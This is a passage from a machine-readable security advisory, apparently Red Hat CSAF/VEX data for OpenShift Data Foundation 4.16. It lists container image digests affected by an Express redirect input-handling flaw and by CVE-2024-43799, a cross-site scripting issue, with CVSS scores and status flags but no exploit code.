"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", 